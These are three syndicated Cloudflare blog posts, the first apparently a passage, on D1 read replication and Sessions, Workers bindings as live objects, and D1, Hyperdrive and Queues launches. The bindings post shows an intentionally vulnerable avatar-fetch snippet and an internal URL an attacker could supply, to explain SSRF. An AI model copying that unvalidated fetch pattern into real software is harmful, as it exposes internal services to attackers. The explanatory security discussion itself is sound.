Most database systems provide read committed, snapshot isolation, or serializable consistency models, depending on their configuration. For example, Postgres defaults to read committed but can be configured to use stronger modes. SQLite provides snapshot isolation in WAL mode. Stronger modes like snapshot isolation or serializable are easier to program against because they limit the permitted system concurrency scenarios and the kind of concurrency race conditions the programmer has to worry about.

Read replicas are updated independently, so each replica’s contents may differ at any moment. If all of your queries go to the same server, whether the primary or a read replica, your results should be consistent according to whatever consistency model your underlying database provides. If you’re using a read replica, the results may just be a little old.

In a server-based database with read replicas, it’s important to stick with the same server for all of the queries in a session. If you switch among different read replicas in the same session, you compromise the consistency model provided by your application, which may violate your assumptions about how the database acts and cause your application to return incorrect results!

For example, there are two replicas, A and B. Replica A lags the primary database by 100ms, and replica B lags the primary database by 2s. Suppose a user wishes to:

  1. Execute query 1
    1a. Do some computation based on query 1 results
  2. Execute query 2 based on the results of the computation in (1a)

At time t=10s, query 1 goes to replica A and returns. Query 1 sees what the primary database looked like at t=9.9s. Suppose it takes 500ms to do the computation, so at t=10.5s, query 2 goes to replica B. Remember, replica B lags the primary database by 2s, so at t=10.5s, query 2 sees what the database looks like at t=8.5s. As far as the application is concerned, the results of query 2 look like the database has gone backwards in time!

Formally, this is read committed consistency since your queries will only see committed data, but there’s no other guarantee – not even that you can read your own writes. While read committed is a valid consistency model, it’s hard to reason about all of the possible race conditions the read committed model allows, making it difficult to write applications correctly.

D1’s consistency model & read replicas

By default, D1 provides the snapshot isolation that SQLite provides.

Snapshot isolation is a familiar consistency model that most developers find easy to use. We implement this consistency model in D1 by ensuring at most one active copy of the D1 database and routing all HTTP requests to that single database. While ensuring that there’s at most one active copy of the D1 database is a gnarly distributed systems problem, it’s one that we’ve solved by building D1 using Durable Objects. Durable Objects guarantee global uniqueness, so once we depend on Durable Objects, routing HTTP requests is easy: just send them to the D1 Durable Object.

This trick doesn’t work if you have multiple active copies of the database since there’s no 100% reliable way to look at a generic incoming HTTP request and route it to the same replica 100% of the time. Unfortunately, as we saw in the previous section’s example, if we don’t route related requests to the same replica 100% of the time, the best consistency model we can provide is read committed.

Given that it’s impossible to route to a particular replica consistently, another approach is to route requests to any replica and ensure that the chosen replica responds to requests according to a consistency model that “makes sense” to the programmer. If we’re willing to include a Lamport timestamp in our requests, we can implement sequential consistency using any replica. The sequential consistency model has important properties like “read my own writes” and “writes follow reads,” as well as a total ordering of writes. The total ordering of writes means that every replica will see transactions commit in the same order, which is exactly the behavior we want in a transactional system. Sequential consistency comes with the caveat that any individual entity in the system may be arbitrarily out of date, but that caveat is a feature for us because it allows us to consider replica lag when designing our APIs.

The idea is that if D1 gives applications a Lamport timestamp for every database query and those applications tell D1 the last Lamport timestamp they’ve seen, we can have each replica determine how to make queries work according to the sequential consistency model.

A robust, yet simple, way to implement sequential consistency with replicas is to:

  • Associate a Lamport timestamp with every single request to the database. A monotonically increasing commit token works well for this.
  • Send all write queries to the primary database to ensure the total ordering of writes.
  • Send read queries to any replica, but have the replica delay servicing the query until the replica receives updates from the primary database that are later than the Lamport timestamp in the query.

What’s nice about this implementation is that it’s fast in the common case where a read-heavy workload always goes to the same replica and will work even if requests get routed to different replicas.

Sneak Preview: bringing read replication to D1 with Sessions

To bring read replication to D1, we will expand the D1 API with a new concept: Sessions. A Session encapsulates all the queries representing one logical session for your application. For example, a Session might represent all requests coming from a particular web browser or all requests coming from a mobile app. If you use Sessions, your queries will use whatever copy of the D1 database makes the most sense for your request, be that the primary database or a nearby replica. D1’s Sessions implementation will ensure sequential consistency for all queries in the Session.

Since the Sessions API changes D1’s consistency model, developers must opt-in to the new API. Existing D1 API methods are unchanged and will still have the same snapshot isolation consistency model as before. However, only queries made using the new Sessions API will use replicas.

Here’s an example of the D1 Sessions API:

export default {
  async fetch(request: Request, env: Env) {
    // When we create a D1 Session, we can continue where we left off
    // from a previous Session if we have that Session's last commit
    // token.  This Worker will return the commit token back to the
    // browser, so that it can send it back on the next request to
    // continue the Session.
    // If we don't have a commit token, make the first query in this
    // session an "unconditional" query that will use the state of the
    // database at whatever replica we land on.
    const token = request.headers.get('x-d1-token') ?? 'first-unconditional'
    const session = env.DB.withSession(token)

    // Use this Session for all our Workers' routes.
    const response = await handleRequest(request, session)

    if (response.status === 200) {
      // Set the token so we can continue the Session in another request.
      response.headers.set('x-d1-token', session.latestCommitToken)
    return response

async function handleRequest(request: Request, session: D1DatabaseSession) {
  const { pathname } = new URL(request.url)

  if (pathname === '/api/orders/list') {
    // This statement is a read query, so it will execute on any
    // replica that has a commit equal or later than `token` we used
    // to create the Session.
    const { results } = await session.prepare('SELECT * FROM Orders').all()

    return Response.json(results)
  } else if (pathname === '/api/orders/add') {
    const order = await request.json<Order>()

    // This statement is a write query, so D1 will send the query to
    // the primary, which always has the latest commit token.
    await session
      .prepare('INSERT INTO Orders VALUES (?, ?, ?)')
      .bind(order.orderName, order.customer, order.value)

    // In order for the application to be correct, this SELECT
    // statement must see the results of the INSERT statement above.
    // The Session API keeps track of commit tokens for queries
    // within the session and will ensure that we won't execute this
    // query until whatever replica we're using has seen the results
    // of the INSERT.
    const { results } = await session
      .prepare('SELECT COUNT(*) FROM Orders')

    return Response.json(results)

  return new Response('Not found', { status: 404 })

D1’s implementation of Sessions makes use of commit tokens.  Commit tokens identify a particular committed query to the database.  Within a session, D1 will use commit tokens to ensure that queries are sequentially ordered.  In the example above, the D1 session ensures that the “SELECT COUNT(*)” query happens after the “INSERT” of the new order, even if we switch replicas between the awaits.  

There are several options on how you want to start a session in a Workers fetch handler.  db.withSession(<condition>) accepts these arguments:

condition argument



(1) starts Session as of given commit token

(2) subsequent queries have sequential consistency


(1) if the first query is read, read whatever current replica has and use the commit token of that read as the basis for subsequent queries.  If the first query is a write, forward the query to the primary and use the commit token of the write as the basis for subsequent queries.

(2) subsequent queries have sequential consistency


(1) runs first query, read or write, against the primary

(2) subsequent queries have sequential consistency

null or missing argument

treated like first-unconditional 

It’s possible to have a session span multiple requests by “round-tripping” the commit token from the last query of the session and using it to start a new session.  This enables individual user agents, like a web app or a mobile app, to make sure that all of the queries the user sees are sequentially consistent.

D1’s read replication will be built-in, will not incur extra usage or storage costs, and will require no replica configuration. Cloudflare will monitor an application’s D1 traffic and automatically create database replicas to spread user traffic across multiple servers in locations closer to users. Aligned with our serverless model, D1 developers shouldn’t worry about replica provisioning and management. Instead, developers should focus on designing applications for replication and data consistency tradeoffs.

We’re actively working on global read replication and realizing the above proposal (share feedback In the #d1 channel on our Developer Discord). Until then, D1 GA includes several exciting new additions.

Check out D1 GA

Since D1’s open beta in October 2023, we’ve focused on D1’s reliability, scalability, and developer experience demanded of critical services. We’ve invested in several new features that allow developers to build and debug applications faster with D1.

Build bigger with larger databases
We’ve listened to developers who requested larger databases. D1 now supports up to 10GB databases, with 50K databases on the Workers Paid plan. With D1’s horizontal scaleout, applications can model database-per-business-entity use cases. Since beta, new D1 databases process 40x more requests than D1 alpha databases in a given period.

Import & export bulk data
Developers import and export data for multiple reasons:

  • Database migration testing to/from different database systems
  • Data copies for local development or testing
  • Manual backups for custom requirements like compliance

While you could execute SQL files against D1 before, we’re improving wrangler d1 execute –file=<filename> to ensure large imports are atomic operations, never leaving your database in a halfway state. wrangler d1 execute also now defaults to local-first to protect your remote production database.

To import our Northwind Traders demo database, you can download the schema & data and execute the SQL files.

npx wrangler d1 create northwind-traders

# omit --remote to run on a local database for development
npx wrangler d1 execute northwind-traders --remote --file=./schema.sql

npx wrangler d1 execute northwind-traders --remote --file=./data.sql

D1 database data & schema, schema-only, or data-only can be exported to a SQL file using:

# database schema & data
npx wrangler d1 export northwind-traders --remote --output=./database.sql

# single table schema & data
npx wrangler d1 export northwind-traders --remote --table='Employee' --output=./table.sql

# database schema only
npx wrangler d1 export <database_name> --remote --output=./database-schema.sql --no-data=true

Debug query performance
Understanding SQL query performance and debugging slow queries is a crucial step for production workloads. We’ve added the experimental wrangler d1 insights to help developers analyze query performance metrics also available via GraphQL API.

# To find top 10 queries by average execution time:
npx wrangler d1 insights <database_name> --sort-type=avg --sort-by=time --count=10

Developer tooling
Various community developer projects support D1. New additions include Prisma ORM, in version 5.12.0, which now supports Workers and D1.

Next steps

The features available now with GA and our global read replication design are just the start of delivering the SQL database needs for developer applications. If you haven’t yet used D1, you can get started right now, visit D1’s developer documentation to spark some ideas, or join the #d1 channel on our Developer Discord to talk to other D1 developers and our product engineering team.

Why Workers environment variables contain live objects

Post Syndicated from Kenton Varda original https://blog.cloudflare.com/workers-environment-live-object-bindings

If you’ve ever written a Cloudflare Worker using Workers KV for storage, you may have noticed something unsettling.

// A simple Worker that always returns the value named "content",
// read from Workers KV storage.
export default {
  async fetch(request, env, ctx) {
    return new Response(await env.MY_KV.get("content"));

Do you feel something is… missing? Like… Where is the setup? The authorization keys? The client library instantiation? Aren’t environment variables normally strings? How is it that env.MY_KV seems to be an object with a get() method that is already hooked up?

Coming from any other platform, you might expect to see something like this instead:

// How would a "typical cloud platform" do it?

// Import KV client library?
import { KV } from "cloudflare:kv";

export default {
  async fetch(request, env, ctx) {
    // Connect to the database?? Using my secret auth key???
    // Which comes from an environment variable????
    let myKv = KV.connect("my-kv-namespace", env.MY_KV_AUTHKEY);

    return new Response(await myKv.get("content"));

As another example, consider service bindings, which allow a Worker to send requests to another Worker.

// A simple Worker that greets an authenticated user, delegating to a
// separate service to perform authentication.
export default {
  async fetch(request, env, ctx) {
    // Forward headers to auth service to get user info.
    let authResponse = await env.AUTH_SERVICE.fetch(
        {headers: request.headers});
    let userInfo = await authResponse.json();
    return new Response("Hello, " + userInfo.name);

Notice in particular the use of env.AUTH_SERVICE.fetch() to send the request. This sends the request directly to the auth service, regardless of the hostname we give in the URL.

On “typical” platforms, you’d expect to use a real (perhaps internal) hostname to route the request instead, and also include some credentials proving that you’re allowed to use the auth service API:

// How would a "typical cloud platform" do it?
export default {
  async fetch(request, env, ctx) {
    // Forward headers to auth service, via some internal hostname?
    // Hostname needs to be configurable, so get it from an env var.
    let authRequest = new Request(
        "https://" + env.AUTH_SERVICE_HOST + "/getUser",
        {headers: request.headers});

    // We also need to prove that our service is allowed to talk to
    // the auth service API. Add a header for that, containing a
    // secret token from our environment.

    // Now we can make the request.
    let authResponse = await fetch(authRequest);
    let userInfo = await authResponse.json();
    return new Response("Hello, " + userInfo.name);

As you can see, in Workers, the “environment” is not just a bunch of strings. It contains full-fledged objects. We call each of these objects a “binding“, because it binds the environment variable name to a resource. You configure exactly what resource a name is bound to when you deploy your Worker – again, just like a traditional environment variable, but not limited to strings.

We can clearly see above that bindings eliminate a little bit of boilerplate, which is nice. But, there’s so much more.

Bindings don’t just reduce boilerplate. They are a core design feature of the Workers platform which simultaneously improve developer experience and application security in several ways. Usually these two goals are in opposition to each other, but bindings elegantly solve for both at the same time.


It may not be obvious at first glance, but bindings neatly solve a number of common security problems in distributed systems.

SSRF is Not A Thing

Bindings, when used properly, make Workers immune to Server-Side Request Forgery (SSRF) attacks, one of the most common yet deadly security vulnerabilities in application servers today. In an SSRF attack, an attacker tricks a server into making requests to other internal services that only it can see, thus giving the attacker access to those internal services.

As an example, imagine we have built a social media application where users are able to set their avatar image. Imagine that, as a convenience, instead of uploading an image from their local disk, a user can instead specify the URL of an image on a third-party server, and the application server will fetch that image to use as the avatar. Sounds reasonable, right? We can imagine the app contains some code like:

let resp = await fetch(userAvatarUrl);
let data = await resp.arrayBuffer();
await setUserAvatar(data);

One problem: What if the user claims their avatar URL is something like “https://auth-service.internal/status”? Whoops, now the above code will actually fetch a status page from the internal auth service, and set it as the user’s avatar. Presumably, the user can then download their own avatar, and it’ll contain the content of this status page, which they were not supposed to be able to access!

But using bindings, this is impossible: There is no URL that the attacker can specify to reach the auth service. The application must explicitly use the binding env.AUTH_SERVICE to reach it. The global fetch() function cannot reach the auth service no matter what URL it is given; it can only make requests to the public Internet.

A legacy caveat: When we originally designed Workers in 2017, the primary use case was implementing a middleware layer in front of an origin server, integrated with Cloudflare’s CDN. At the time, bindings weren’t a thing yet, and we were primarily trying to implement the Service Workers interface. To that end, we made a design decision: when a Worker runs on Cloudflare in front of some origin server, if you invoke the global fetch() function with a URL that is within your zone’s domain, the request will be sent directly to the origin server, bypassing most logic Cloudflare would normally apply to a request received from the Internet. Sadly, this means that Workers which run in front of an origin server are not immune to SSRF – they must worry about it just like traditional servers on private networks must. Although this puts Workers in the same place as most servers, we now see a path to make SSRF a thing you never have to worry about when writing Workers. We will be introducing “origin bindings”,  where the origin server is represented by an explicit binding. That is, to send a request to your origin, you’d need to do env.ORIGIN.fetch(). Then, the global fetch() function can be restricted to only talk to the public Internet, fully avoiding SSRF. This is a big change and we need to handle backwards-compatibility carefully – expect to see more in the coming months. Meanwhile, for Workers that do not have an origin server behind them, or where the origin server does not rely on Cloudflare for security, global fetch() is SSRF-safe today.

And a reminder: Requests originating from Workers have a header, CF-Worker, identifying the domain name that owns the Worker. This header is intended for abuse mitigation: if your server is receiving abusive requests from a Worker, it tells you who to blame and gives you a way to filter those requests. This header is not intended for authorization. You should not implement a private API that grants access to your Workers based solely on the CF-Worker header matching your domain. If you do, you may re-open the opportunity for SSRF vulnerabilities within any Worker running on that domain.

You can’t leak your API key if there is no API key

Usually, if your web app needs access to a protected resource, you will have to obtain some sort of an API key that grants access to the resource. But typically anyone who has this key can access the resource as if they were the Worker. This makes handling auth keys tricky. You can’t put it directly in a config file, unless the entire config file is considered a secret. You can’t check it into source control – you don’t want to publish your keys to GitHub! You probably shouldn’t even store the key on your hard drive – what if your laptop is compromised? And so on.

Even if you have systems in place to deliver auth keys to services securely (like Workers Secrets), if the key is just a string, the service itself can easily leak it. For instance, a developer might carelessly insert a log statement for debugging which logs the service’s configuration – including keys. Now anyone who can access your logs can discover the secret, and there’s probably no practical way to tell if such a leak has occurred.

With Workers bindings, we endeavor for bindings to be live objects, not secret keys. For instance, as seen in the first example in this post, when using a Workers KV binding, you never see a key at all. It’s therefore impossible for a Worker to accidentally leak access to a KV namespace.

No certificate management

This is similar to the API key problem, but arguably worse. When internal services talk to each other over a network, you presumably want them to use secure transports, but typically that requires that every service have a certificate and a private key signed by some CA, and clients must be configured to trust that CA. This is all a big pain to manage, and often the result is that developers don’t bother; they set up a VPC and assume the network is trusted.

In Workers, since all intra-service communications happen over a binding, the system itself can take on all the work of ensuring the transport is secure and goes to the right place.

No frustrating ACL management – but also no lazy “allow all”

At this point you might be thinking: Why are we talking about API keys at all? Cloudflare knows which Worker is sending any request. Can’t it handle the authentication that way?

Consider the earlier example where we imagined that KV namespaces could be opened by name:

// Imagine KV namespaces could be open by name?
let myKv = KV.connect("my-kv-namespace", env.MY_KV_AUTHKEY);

What if we made it simply:

// No authkey, because the system knows whether the Worker has
// permission?
let myKv = KV.connect("my-kv-namespace");

We could then imagine that we could separately configure each KV namespace with an Access Control List (ACL) that specifies which Workers can access it.

Of course, the first problem with this is that it’s vulnerable to SSRF. But, we discussed that already, so let’s discuss another problem.

Many platforms use ACLs for security, but have you ever noticed how everyone hates them? You end up with two choices:

  • Tediously maintain ACLs on every resource. Inevitably, this is always a huge pain. First you deploy your code, which you think is properly configured. Then you discover that it’s failing with permissions errors causing a production outage! So you go fiddle with the IAM system. There are 533,291 roles to choose from and none of them are actually what you want. It turns out you’re supposed to create a custom role, but that’s not obvious, and once you get there, the UI is confusing. Also it’s easy to confuse your team’s service account with your team’s email group, so you give the permissions to the wrong principal, but it takes you an hour of staring at it to realize what you did wrong. Then somehow you manage to remove your own access to the resource and you can’t add it back even though you’re a project admin? (Why yes, all this did in fact happen to me, while using a cloud provider that shall remain nameless.)
  • Give up and grant everything access to everything. Just put all your services in a single VPC where they can all freely talk to each other. This is what most developers are inclined to do, if their security team doesn’t step in to stop them.

Much of this pain comes about because connecting a server to a resource today involves two steps that should really be one step:

  1. Configure the server to point at the resource.
  2. Configure the resource to accept requests from the server.

Developers are primarily concerned with step 1, and forget that step 2 exists until it blows up in their faces. Then it’s a mad scramble to learn how step 2 even works.

What if step 1 just implied step 2? Obviously, if you’re trying to configure a service to access a resource, then you also want the resource to allow access to the service. As long as the person trying to set this up has permissions to both, then there is no reason for this to be a two-step process.

But in typical platforms, the platform itself has no way of knowing that a service has been configured to talk to a resource, because the configuration is just a string.

Bindings fix that. When you define a binding from a Worker to a particular KV namespace, the platform inherently understands that you are telling the Worker to use the KV namespace. Therefore, it can implicitly ensure that the correct permissions are granted. There is no step 2.

And conversely, if no binding is configured, then the Worker does not have access. That means that every Worker starts out with no access by default, and only receives access to exactly the things it needs. Secure by default.

As a related benefit, you can always accurately answer the question “What services are using this resource?” based on bindings. Since the system itself understands bindings and what they point to, the system can answer the query without knowing anything about the service’s internals.

Developer Experience

We’ve seen that bindings improve security in a number of ways. Usually, people expect security and developer friendliness to be a trade-off, with each security measure making life harder for developers. Bindings, however, are entirely the opposite! They actually make life easier!

Easier setup

As we saw in the intro, using a binding reduces setup boilerplate. Instead of receiving an environment variable containing an API key which must be passed into some sort of library, the environment variable itself is an already-initialized client library.


Because the system understands what bindings a Worker has, and even exactly when those bindings are exercised, the system can answer a lot of questions that would normally require more manual instrumentation or analysis to answer, such as:

  • For a given Worker, what resources does it use? Since the system understands the types of all bindings and what they point to (it doesn’t just see them as opaque strings), it can answer this question.
  • For a given resource, which Workers use it? This is the reverse query. The system can maintain an index of bindings in order to find ones pointing at a given resource.
  • How often does a particular Worker use a particular resource? Since bindings are invoked by calling methods on the binding itself, the system can observe these calls, log them, collect metrics, etc.

Testability via dependency injection

When you deploy a test version of your service, you probably want it to operate on test resources rather than real production resources. For instance, you might have a separate testing KV namespace for storage. But, you probably want to deploy exactly the same code to test that you will eventually deploy to production. That means the names of these resources cannot be hard-coded.

On traditional platforms, the obvious way to avoid hard-coding resource names is to put the name in an environment variable. Going back to our example from the intro, if KV worked in a traditional way not using bindings, you might end up with code like this:

// Hypothetical non-binding-based KV.
let myKv = KV.connect(env.MY_KV_NAMESPACE, env.MY_KV_AUTHKEY);

At best, you now have two environment variables (which had better stay in sync) just to specify what namespace to use.

But at worst, developers might forget to parameterize their resources this way.

  • A developer may write new code that is hard-coded to use a test database, and then forget to update it before pushing it to production, accidentally using the test database in prod.
  • A developer might prototype a new service using production resources from the start (or using new resources which become production resources), only later on deciding that they need to create a new deployment for testing. But by then, it may be a pain to find and parameterize all the different resources used.

With bindings, it’s impossible to have this problem. Since you can only connect to a KV namespace through a binding, it’s always possible to make a separate deployment of the same code which talks to a test namespace instead of production, e.g. using Wrangler Environments.

In the testing world, this is sometimes called “dependency injection”. With bindings, dependencies are always injectable.


Dependency injection isn’t just for tests. A service whose dependencies can be changed out easily will be easier to deploy into new environments, including new production environments.

Say, for instance, you have a service that authenticates users. Now you are launching a new product, which, for whatever reason, has a separate userbase from the original product. You need to deploy a new version of the auth service that uses a different database to implement a separate user set. As long as all dependencies are injectable, this should be easy.

Again, bindings are not the only way to achieve dependency injection, but a bindings-based system will tend to lead developers to write dependency-injectable code by default.


Has anyone done this before?

You have. Every time you write code.

As it turns out, this approach is used all the time at the programming language level. Bindings are analogous to parameters of a function, or especially parameters to a class constructor. In a memory-safe programming language, you can’t access an object unless someone has passed you a pointer or reference to that object. Objects in memory don’t have URLs that you use to access them.

Programming languages work this way because they are designed to manage complexity, and this proves to be an elegant way to do so. Yet, this style which we’re used to using at the programming language level is much less common at the distributed system level. The Cloudflare Workers platform aims to treat the network as one big computer, and so it makes sense to extend programming language concepts across the network.

Of course, we’re not the first to apply this to distributed systems, either. The paradigm is commonly called “capability-based security”, which brings us to the next question…

Is this capability-based security?

Bindings are very much inspired by capability-based security.

At present, bindings are not a complete capability system. In particular, there is currently no particular mechanism for a Worker to pass a binding to another Worker. However, this is something we can definitely imagine adding in the future.

Imagine, for instance, you want to call another Worker through a service binding, and as you do, you want to give that other Worker temporary access to a KV namespace for it to operate on. Wouldn’t it be nice if you could just pass the object, and have it auto-revoked at the end of the request? In the future, we might introduce a notion of dynamic bindings which can bind to different resources on a per-request basis, where a calling Worker can pass in a particular value to use for a given request.

For the time being, bindings cannot really be called object capabilities. However, many of the benefits of bindings are the same benefits commonly attributed to capability systems. This is because of some basic similarities:

  • Like a capability, a binding simultaneously designates a resource and also confers permission to access that resource, without referencing any separate ACL.
  • Like capabilities, bindings do not exist in any global namespace: they are scoped to the env object passed to a specific Worker.
  • Like a capability, to use a binding, the application must explicitly specify which binding it is trying to use, and only specifies the binding. In particular, the application does not separately specify the name of the resource in any other namespace (no URL, no global ID, etc.). The existence of the binding only affects the application’s behavior when the application explicitly invokes that binding.

Why is env a parameter to fetch(), not global?

This is a bit wonky, but the goal is to enable composition of Workers.

Imagine you have two Workers, one which implements your API, mapped to api.example.com, and one which serves static assets, mapped to assets.example.com. One day, for whatever reason, you decide you want to combine these two Workers into a single Worker. So you write this code:

import apiWorker from "api-worker.js";
import assetWorker from "asset-worker.js";

export default {
  async fetch(req, env, ctx) {
    let url = new URL(req.url);
    if (url.hostname == "api.example.com") {
      return apiWorker.fetch(req, env, ctx);
    } else if (url.hostname == "assets.example.com") {
      return assetWorker.fetch(req, env, ctx);
    } else {
      return new Response("Not found", {status: 404});

This is great! No code from either Worker needed to be modified at all. We just create a new file containing a router Worker that delegates to one or the other.

But, you discover a problem: both the API Worker and the assets Worker use a KV namespace binding, and it turns out that they both decided to name the binding env.KV, but these bindings are meant to point to different namespaces used for different purposes. Does this mean I have to go edit the Workers to change the name of the binding before I can merge them?

No, it doesn’t, because I can just remap the environments before delegating:

import apiWorker from "api-worker.js";
import assetWorker from "asset-worker.js";

export default {
  async fetch(req, env, ctx) {
    let url = new URL(req.url);
    if (url.hostname == "api.example.com") {
      let subenv = {KV: env.API_KV};
      return apiWorker.fetch(req, subenv, ctx);
    } else if (url.hostname == "assets.example.com") {
      let subenv = {KV: env.ASSETS_KV};
      return assetWorker.fetch(req, subenv, ctx);
    } else {
      return new Response("Not found", {status: 404});

If environments were globals, this remapping would not be possible.

In fact, this benefit goes much deeper than this somewhat-contrived example. The fact that the environment is not a global essentially forces code to be internally designed for dependency injection (DI). Designing code to be DI-friendly sometimes seems tedious, but every time I’ve done it, I’ve been incredibly happy that I did. Such code tends to be much easier to test and to adapt to new circumstances, for the same reasons mentioned when we discussed dependency injection earlier, but applying at the level of individual modules rather than whole Workers.

With that said, if you really insist that you don’t care about making your code explicitly DI-friendly, there is an alternative: Put your env into AsyncLocalStorage. That way it is “ambiently” available anywhere in your code, but you can still get some composability.

import { AsyncLocalStorage } from 'node:async_hooks';

// Allocate a new AsyncLocalStorage to store the value of `env`.
const ambientEnv = new AsyncLocalStorage();

// We can now define a global function that reads a key from env.MY_KV,
// without having to pass `env` down to it.
function getFromKv(key) {
  // Get the env from AsyncLocalStorage.
  return ambientEnv.getStore().MY_KV.get(key);

export default {
  async fetch(req, env, ctx) {
    // Put the env into AsyncLocalStorage while we handle the request,
    // so that calls to getFromKv() work.
    return ambientEnv.run(env, async () => {
      // Handle request, including calling functions that may call
      // getFromKv().

      // ... (code) ...

How does a KV binding actually work?

Under the hood, a Workers KV binding encapsulates a secret key used to access the corresponding KV namespace. This key is actually the encryption key for the namespace. The key is distributed to the edge along with the Worker’s code and configuration, using encrypted storage to keep it safe.

Although the key is distributed with the Worker, the Worker itself has no way to access the key. In fact, even the owner of the Cloudflare account cannot see the key – it is simply never revealed outside of Cloudflare’s systems. (Cloudflare employees are also prevented from viewing these keys.)

Even if an attacker somehow got ahold of the key, it would not be useful to them as-is. Cloudflare’s API does not provide any way for a user to upload a raw key to use in a KV binding. The API instead has the client specify the public ID of the namespace they want to use. The deployment system verifies that the KV namespace in question is on the same account as the Worker being uploaded (and that the client is authorized to deploy Workers on said account).

Get Started

To learn about all the types of bindings offered by Workers and how to use them, check out the documentation.

Making state easy with D1 GA, Hyperdrive, Queues and Workers Analytics Engine updates

Post Syndicated from Rita Kozlov original https://blog.cloudflare.com/making-full-stack-easier-d1-ga-hyperdrive-queues

Making full-stack easier

Today might be April Fools, and while we like to have fun as much as anyone else, we like to use this day for serious announcements. In fact, as of today, there are over 2 million developers building on top of Cloudflare’s platform — that’s no joke!

To kick off this Developer Week, we’re flipping the big “production ready” switch on three products: D1, our serverless SQL database; Hyperdrive, which makes your existing databases feel like they’re distributed (and faster!); and Workers Analytics Engine, our time-series database.

We’ve been on a mission to allow developers to bring their entire stack to Cloudflare for some time, but what might an application built on Cloudflare look like?

The diagram itself shouldn’t look too different from the tools you’re already familiar with: you want a database for your core user data. Object storage for assets and user content. Maybe a queue for background tasks, like email or upload processing. A fast key-value store for runtime configuration. Maybe even a time-series database for aggregating user events and/or performance data. And that’s before we get to AI, which is increasingly becoming a core part of many applications in search, recommendation and/or image analysis tasks (at the very least!).

Yet, without having to think about it, this architecture runs on Region: Earth, which means it’s scalable, reliable and fast — all out of the box.

D1: Production Ready

Your core database is one of the most critical pieces of your infrastructure. It needs to be ultra-reliable. It can’t lose data. It needs to scale. And so we’ve been heads down over the last year getting the pieces into place to make sure D1 is production-ready, and we’re extremely excited to say that D1 — our global, serverless SQL database — is now Generally Available.

The GA for D1 lands some of the most asked-for features, including:

  • Support for 10GB databases — and 50,000 databases per account;
  • New data export capabilities; and
  • Enhanced query debugging (we call it “D1 Insights”) — that allows you to understand what queries are consuming the most time, cost, or that are just plain inefficient…  

… to empower developers to build production-ready applications with D1 to meet all their relational SQL needs. And importantly, in an era where the concept of a “free plan” or “hobby plan” is seemingly at risk, we have no intention of removing the free tier for D1 or reducing the 25 billion row reads included in the $5/mo Workers Paid plan:


Rows Read

Rows Written


Workers Paid

First 25 billion / month included

+ $0.001 / million rows

First 50 million / month included

+ $1.00 / million rows

First 5 GB included

+ $0.75 / GB-mo

Workers Free

5 million / day

100,000 / day

5 GB (total)

For those who’ve been following D1 since the start: this is the same pricing we announced at open beta

But things don’t just stop at GA: we have some major new features lined up for D1, including global read replication, even larger databases, more Time Travel capabilities that will allow you to branch your database, and new APIs for dynamically querying and/or creating new databases-on-the-fly from within a Worker.

D1’s read replication will automatically deploy read replicas as needed to get data closer to your users: and without you having to spin up, manage scaling, or run into consistency (replication lag) issues. Here’s a sneak preview of what D1’s upcoming Replication API looks like:

export default {
  async fetch(request: Request, env: Env) {
    const {pathname} = new URL(request.url);
    let resp = null;
    let session = env.DB.withSession(token); // An optional commit token or mode

    // Handle requests within the session.
    if (pathname === "/api/orders/list") {
      // This statement is a read query, so it will work against any
      // replica that has a commit equal or later than `token`.
      const { results } = await session.prepare("SELECT * FROM Orders");
      resp = Response.json(results);
    } else if (pathname === "/api/orders/add") {
      order = await request.json();

      // This statement is a write query, so D1 will send the query to
      // the primary, which always has the latest commit token.
      await session.prepare("INSERT INTO Orders VALUES (?, ?, ?)")
        .bind(order.orderName, order.customer, order.value);

      // In order for the application to be correct, this SELECT
      // statement must see the results of the INSERT statement above.
      // D1's new Session API keeps track of commit tokens for queries
      // within the session and will ensure that we won't execute this
      // query until whatever replica we're using has seen the results
      // of the INSERT.
      const { results } = await session.prepare("SELECT COUNT(*) FROM Orders")
      resp = Response.json(results);

    // Set the token so we can continue the session in another request.
    resp.headers.set("x-d1-token", session.latestCommitToken);
    return resp;

Importantly, we will give developers the ability to maintain session-based consistency, so that users still see their own changes reflected, whilst still benefiting from the performance and latency gains that replication can bring.

You can learn more about how D1’s read replication works under the hood in our deep-dive post, and if you want to start building on D1 today, head to our developer docs to create your first database.

Hyperdrive: GA

We launched Hyperdrive into open beta last September during Birthday Week, and it’s now Generally Available — or in other words, battle-tested and production-ready.

If you’re not caught up on what Hyperdrive is, it’s designed to make the centralized databases you already have feel like they’re global. We use our global network to get faster routes to your database, keep connection pools primed, and cache your most frequently run queries as close to users as possible.

Importantly, Hyperdrive supports the most popular drivers and ORM (Object Relational Mapper) libraries out of the box, so you don’t have to re-learn or re-write your queries:

// Use the popular 'pg' driver? Easy. Hyperdrive just exposes a connection string
// to your Worker.
const client = new Client({ connectionString: env.HYPERDRIVE.connectionString });
await client.connect();

// Prefer using an ORM like Drizzle? Use it with Hyperdrive too.
// https://orm.drizzle.team/docs/get-started-postgresql#node-postgres
const client = new Client({ connectionString: env.HYPERDRIVE.connectionString });
await client.connect();
const db = drizzle(client);

But the work on Hyperdrive doesn’t stop just because it’s now “GA”. Over the next few months, we’ll be bringing support for the other most widely deployed database engine there is: MySQL. We’ll also be bringing support for connecting to databases inside private networks (including cloud VPC networks) via Cloudflare Tunnel and Magic WAN On top of that, we plan to bring more configurability around invalidation and caching strategies, so that you can make more fine-grained decisions around performance vs. data freshness.

As we thought about how we wanted to price Hyperdrive, we realized that it just didn’t seem right to charge for it. After all, the performance benefits from Hyperdrive are not only significant, but essential to connecting to traditional database engines. Without Hyperdrive, paying the latency overhead of 6+ round-trips to connect & query your database per request just isn’t right.

And so we’re happy to announce that for any developer on a Workers Paid plan, Hyperdrive is free. That includes both query caching and connection pooling, as well as the ability to create multiple Hyperdrives — to separate different applications, prod vs. staging, or to provide different configurations (cached vs. uncached, for example).


Price per query

Connection Pooling

Workers Paid



To get started with Hyperdrive, head over to the docs to learn how to connect your existing database and start querying it from your Workers.

Queues: Pull From Anywhere

The task queue is an increasingly critical part of building a modern, full-stack application, and this is what we had in mind when we originally announced the open beta of Queues. We’ve since been working on several major Queues features, and we’re launching two of them this week: pull-based consumers and new message delivery controls.

Any HTTP-speaking client can now pull messages from a queue: call the new /pull endpoint on a queue to request a batch of messages, and call the /ack endpoint to acknowledge each message (or batch of messages) as you successfully process them:

// Pull and acknowledge messages from a Queue using any HTTP client
$  curl "https://api.cloudflare.com/client/v4/accounts/${CF_ACCOUNT_ID}/queues/${QUEUE_ID}/messages/pull" -X POST --data '{"visibilityTimeout":10000,"batchSize":100}}' \
     -H "Authorization: Bearer ${QUEUES_TOKEN}" \
